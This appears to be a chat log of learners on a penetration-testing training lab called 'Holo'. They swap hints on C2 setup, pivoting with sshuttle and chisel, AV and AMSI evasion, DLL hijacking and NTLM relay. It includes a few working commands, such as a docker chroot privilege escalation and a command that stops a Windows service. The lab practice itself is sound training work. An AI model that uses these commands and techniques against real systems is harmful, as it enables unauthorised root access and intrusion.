I am installing Covenant on Kali. I have followed the instructions as mentioned, but when I create a listener, no matter how many times, it's not visible. It's not showing any errors. Any help?
two options either clean it ( make it undetectable )
or dont use covenant :)
and use something else
maybe clean covenant is the better way
since you would have a c2 in your hands
How does cleaning covenant have anything to do with creating a listener?
idk I just said boooo covenant and did it manually
When the challenge/competition is over is there going to be a place were you can read other people's reports?
cry do we need to specify like what penetration test methodology we used?
nist ptes etc?
in the report
like a normal pentest report ?
pivoting is the devils work
sshuttle do the sshuttle things ezpz
I tried that keep getting errors
odd? what errors?
sshuttle is like the most stable option possible and what we suggest using
can you get a stable connection with normal ssh?
yeah
sshuttle is unstable in holo for some reason
I mean that machine has been weirdly unstable for whatever reason that is beyond me but if ssh is stable it should be
like saying closed ports are open unstable
just used something else for scanning.
I even created a root user to use on the victim machine so I had root privs for the tunnel
tried that and still nothing
as linux-admin is not root
What other tools have you used to pivot?
oh dont even start me on chisel
I set it all up and tried to ping the dc got nothing
Ive stared at that machine and still have no clue what its problem is
ICMP doesnt work over proxy
icmp no like pivot
ha
ok
thats really useful to know 🙂
I mean technically once you have root on that machine you could do everything from there surely? lol
It has nothing to do with privileges
youre not running commands from the machine
youre running them through the machine
yeah
I get that element, just getting it to work is another matter haha
this has been the most complex, frustrating YET extremely rewarding network I have ever worked in.....perfect prep for OSCP in my opinion in terms of methods etc
because they're missing -x 10.200.x.33/32
doing the privilege escalation on .33 anyone can give me a nudge of what is the password of www-data?
you dont need it
you need to understand what gtfobins is providing you rather than copy and pasting
man can you give me a nudge on this?
well with just a bit of nix knowledge you can tell that the top line is using sudo to identify the version of docker
we don’t care about that it’s irrelevant to us
if we also look at the line of the actual exploit it specifies an OS that the target isn’t even running so it needs to be modified
you can just put everything here
this is what I used
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
also removing the "sh"
also found a blog talking about the same exploit, however neither of them is working
as I said it uses a specific OS that you need to modify
Im having issues getting past the fuzzing task. wfuzz and gobuster both keep crashing the server even with limiting the thread count to 1. Anyone got any tips?
What subnet are you on
146
someone messed up the machine
hahahaha
@lone spruce man, will try to work on this docker privesc after the machine start running as default again. Thanks
Gave +1 Rep to @lone spruce
I always do because it's better to not assume kek
and -x has always been a requirement
last part was time consuming, but an awesome learning
My brain really glitched out because I thought that was a user we put in
hehe
well done
Can anyone help reset the machine?
oh you did from rdp 👀
added myself as local admin who is in the remote desktop group
ah i added myself in domain admins group lol
Task 42, the same info twice
hello; im in task 20 and i cant privesc with docker suid
it says alpine:latest can't be found and it can't install it
help?
You can't just copy the command, you need to change it a bit
You need to understand what the command does
I'm on the same task as well, can we help each other if possible?
got it
anyone else having issues? cant scan 192.168.100.0/24 all hosts down
from?
please disregard my previous message
🙂
last night I got all the way to typing out that I needed help with a problem before I figured it out 🙂
this was for a colleague from my work, I said he should try it out as he is sitting some CREST certs soon and it is good to polish up on different vectors, I had misinformed him on the IP range to scan to get the webserver for holo live
lol
I- I- I don’t have the brain power for this
@frigid nacelle Tiiiiiiim it’s doing the thing
this av evasion stuff is MURDERING me
it was fun in wreath.
and I got shell, b/c my reverse shell code isn't caught by av, but to skip the covenant stuff would be a shame... but... I think there's stuff missing. like the stuff on how to use the tools.
(meaning that I think it presumes a level of knowledge in .net)
it might not be a shame. because u still have to bypass stuff with reverse shell too.
and covenant is weird
thats the fun part 😉
hey guys
need help in privilege escalation in PC FILE server
I wasn't able to find the vulnerable application
have a look in task manager, should "scream" at you 🙂
I mean it’s about the only application there
I got that
thanks pal
Gave +1 Rep to @river summit
thanks
how did you find out that this is the vulnerable application? and in the room it said that you can find the application in the scheduled tasks? I'm asking this because I need to improve my perspective and methodology
i didn't find it in scheduled tasks, but i did see it in task manager early. And then i came across it in an unusual folder... searched google for the filename and dll, and was ready to go
looking in the schedule tasks was hopeless as i guess you also found out 😛
for pivoting part? which machine do we need to start the client? on LSRV01? or 02?
forget my question. found the answer
yahh pal, Its totally useless
Thanks once again for the explanation !!!
Gave +1 Rep to @river summit
One more ques ... how to find the dll file for that application ? and that vulnerable application is a single executable file
Procmon needs administrative privileges
ask our common best friend... filename dll <what_you_are_about_do> 🙂
the first result i got was spot on
maybe use process hacker 2:)
tell me more about it
has anything happened to the machine cuz I wasn't able to ping the machine
any moderator plz help
That is not what mods are for
Mods are for moderating the discord, not site staff or site help
Also remember that there are a large number of separate networks.
hey guys im having problems with pivoting, any help?
I think I have a dumb question...one of the cidr ranges given in task 8 is 10.200.x.0/24. Am I supposed to figure out which /24 it is or is that a typo?
no, just use 10.200.X.0/24
I fixed my command and I'm guessing it'll only come back with one /24 this time
The third octet depends what network instance you're on. You should know it.
Yea I scrolled up to the diagram after posting. The network had gone offline after I got on. I figured this wouldn't go well right when I wake up.
Hi, can anyone guide on escalating privileges, on L-SRV01? I tried the GTFOBins but it's not working.
What command did you use?
sudo install -m =xs $(which docker) .
That is the wrong command, you need to modify the second command that you get from GTFObins
The docker image is already on the machine
That command is for installing the docker image
That message'll be from the sudo part
Yes, missed a step there. Completed it now.
Do we need to specify the image id here?
Getting this on the normal command, Unable to find image 'alpine:latest' locally
yes
there is an image on the machine that you will use
There are 5 images on the machine with 4 having <none> label. I need t try all of them? XD
there should be one at the bottom or at the top of the list iirc?
one that you can use
Got it! Thanks Man!
Glad to help :)
yea maybe that. Thats why i thought to write my own c2 when I have some time cause honestly that way I would know what and how things are working and why its breaking/crashing/getting detected
Do we need to use google colab to crack the password? And which word list is advisable to use?
That’s all specified in the task
Hey anyone knows how to use procmon without administrative privileges ?
you transfer the binary to your own windows machine and use procmon on there
Okay
not really good at web, anyone can help on task 28?
I remember that made me mald
This pivoting has my head spun lol, I have ran chisel as per guide....now how on gods green earth can I access the s-srv01 web page via my browser??
and how can I test if I have it set up correctly?
if you can access the web page. which means it works
proxychains nmap 10.200.197.31 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.14 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-05 16:11 EDT nmap: netutil.cc:1319: int collect_dnet_interfaces(const intf_entry*, void*): Assertion rc == 0' failed. Aborted
I haven't tried to use chisel for proxy nmap, I upload a nmap on the machine and run it for me to view all the internal IP and their ports.
nmap doesn't like proxies
Setting up a proxy in you’re web browser or using foxy proxy
Yeah I have figured it out now, however....do I need to edit burp to use the proxychain port now to use it?
the AV evasion here is way harder than wreath machine. do you guys use covenant or just ordinary reverse shell?
Did it without covenant.
Can you give me a nudge what did you do? did you try to get a rce first?
something in that order.
but it seems like everyone has done AV evasion differently.
How to add our Example Task on the C2? I followed the instructions and created a YAML on the given path. Used the build command and then the run command, but it's still not showing.
If I have to follow the AV evasion tasks, do I need to have a windows OS to build payload?
Same as Simardeep, I've created a yaml example file, cloned the SharpEDRchecker repo into the appropriate directories. Checked the permissions are all the same as the documents that come with Covenant, and entered dotnet build and run commands, but nothing shows up when I reopen Covenant. Any ideas what I might have missed?
In the web exploitation part, I am unable to get the Password Reset Page/Option on S-SRV01. What am I missing?
Not necessarily
Cool, thanks.
Gave +1 Rep to @vapid umbra
how did i trigger the vulnerable application in the PC File server
cry if i clean the covenant then there is no need for amsi bypass right? because i tested it i powershell works also without even used an amsi bypass
You just answered your question in the same message
yes i know i just wanna clarify if it needs to use an amsi bypass
question: I'm doing task 23 and trying to sshuttle onto the ||10.200.169.33|| by using ||sshuttle -r linux-admin@10.200.169.33 0/0|| but every time the connection is established, when I press any key I'm getting the "Network error: Software caused connection abort" and I'm getting kicked off the session; what could be the problem? I'm using Kali over PuTTY
You might want to include the -x and a more specific subnet to forward?
hmm
why may I want to exclude some subnet?
You want to exclude the box you're connecting to
Otherwise it can try to route the traffic to that machine over the tunnel and the machine will never get it
hmm yeah I've added the -x and it kinda worked... I mean it didn't shut down, but I didn't specify a subnet to forward (kept 0/0) and I'm getting weird responses from nmap, like.. all ports are open on the scanned server 😛
maybe I'll try asking another question - how should I know I've successfully pivoted on that task 23?
ahh.. I think I get the pattern - when I nmap -sT some ip I've established a connection with via sshuttle - I'm getting all ports open - is it known behaviour? can it be somehow fixed if it is wrong?
known behavior
ohh why so, can you elaborate/provide some resources?
dunno, I didn't write sshuttle
but
best solution is to port scan on the intermediary Linux device
nmap portable binaries are available
hmhm okey, so.. what for is pivoting? I thought I can perform same operations that I would do without connecting to the proxy server
I think i have to go along with tutorial and come back to that question afterwards
and I noticed that I can for example curl pages like I was inside the network.. ok so that makes me think I did it correctly, thanks @quiet raft @wind bobcat
Gave +1 Rep to @quiet raft
basically, any time you proxy traffic through another machine, it's not going to be perfect
There's plenty of ways to portscan too, especially if you got root
yeah I just thought it would be possible via that.. pivot operation
and if you can curl pages -- that's good. you've set it up correctly
Hey, in PC FILE SERVER the netlogon services doesnt stop
and how could I restart the machine ?
heyy plz can anyone tell me how to do the ntlm relay attack in holo
??
how do you mean it doesn't stop? you need to provide more info
okay sorry It stopped
but how to restart the pc
?
C:\Windows\Tasks>sc stop lanmanworkstation
sc stop lanmanworkstation
[SC] ControlService FAILED 1051:
A stop control has been sent to a service that other running services are dependent on.
net stop lanmanworkstation /yes
(in normal cmd shell not powershell )
that would work
@vapid umbra
search it up. there is a command for it dont remember it now.
also u might need to logoff the users if u have a rdp session running. before restarting
i got this command shutdown /r
try it
access denied
you should have a shell as nt \ authority after the dll hijacking
first I have to disable all the services then restart right ?
run powershell and type Restart-Computer/Restart-System either of them will work i dont know exactly it might show u that users are logged in
if thats the case u have to logoff
the users first
but im the nt user
Doesn’t seem like it
ree windows
I wonder if someone screwed around with the machine to show mitigations
I would say reset the network and see what happens
Okayyy
Thanks @lone spruce
Gave +1 Rep to @lone spruce
rdp into the machine, do the dll hijacking, start over with the ntlm relay
hey Im successful in stopping the service and restart
and I also started the ntlmrelay
but didnt get anything
I haven't done the ntlm relay part yet unfortunately, I'm not at that step
Okay man
thank you
Gave +1 Rep to @upper rock
glad to help :)
Anyone got any tips, im stuck at task 14. Im following all the steps exactly but after the last command i do not get a 'full' shell?
Once i bring my shell back using fg, and i type reset it doesnt seem to reset the shell?
stty raw -echo; fg
